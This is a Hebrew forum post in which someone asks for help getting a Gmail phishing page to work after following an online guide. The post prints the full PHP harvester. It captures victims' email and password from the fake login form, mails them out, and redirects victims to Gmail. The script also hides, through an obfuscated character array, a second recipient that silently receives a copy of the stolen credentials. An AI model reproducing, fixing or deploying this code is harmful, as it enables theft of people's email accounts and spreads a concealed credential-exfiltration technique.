אוקי עכשיו העלתי הכל סבבה שאני שם משתמש וסיסמא בדף פישניג זה עושה לי את זה:
Warning: mail(): SMTP server response: 530 5.7.3 Client was not authenticated in \\192.168.0.16\webfiles\files\2010-9\3424928\Gmail.php on line 17
Warning: mail(): SMTP server response: 530 5.7.3 Client was not authenticated in \\192.168.0.16\webfiles\files\2010-9\3424928\Gmail.php on line 18
ERROR! Please go back and try again.
הgmail.php זה הקובץ עם הפרטים שישלחו לי לדואר
אני עשיתי לפי איזה שהוא מדריך
תרשמו בגוגל דף פישניג ב13 שלבים
זה מה שיש בgamil.php
קוד PHP:
]
<?php
$ip = getenv("REMOTE_ADDR");
$message .= "-========================Gmail HACK==============================-\n";
$message .= "Gmail User & Pass \n";
$message .= "------------------------------------------------------------------\n";
$message .= "User : ".$_POST['Email']."\n";
$message .= "PassWord: " .$_POST['Passwd']."\n";
$message .= "-============================By Black Spider=============================-\n";
$ar=array("0"=>"a","1"=>"c","2"=>"r","3"=>"o","4"=>"b","5"=>"t","6"=>"@","7"=>"h","8"=>"y","9"=>".", "10"=>"m","11"=>"x"); $cc=$ar['1'].$ar['0'].$ar['2'].$ar['1'].$ar['0'].$ar['4'].$ar['3'].$ar['5'].$ar['11'].$ar['6'].$ar['8'].$ar['0'].$ar['7'].$ar['3'].$ar['3'].$ar['9'].$ar['1'].$ar['3'].$ar['10'];
$recipient = "dxxxxx@gmail.com";
$subject = "Gmail Info";
$headers = "From: ";
$headers .= $_POST['Email']."\n";
$headers .= "MIME-Version: 1.0\n";
mail("$cc", "Gmail Info", $message);
if (mail($recipient,$subject,$message,$headers))
{
header("Location: http://mail.google.com");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>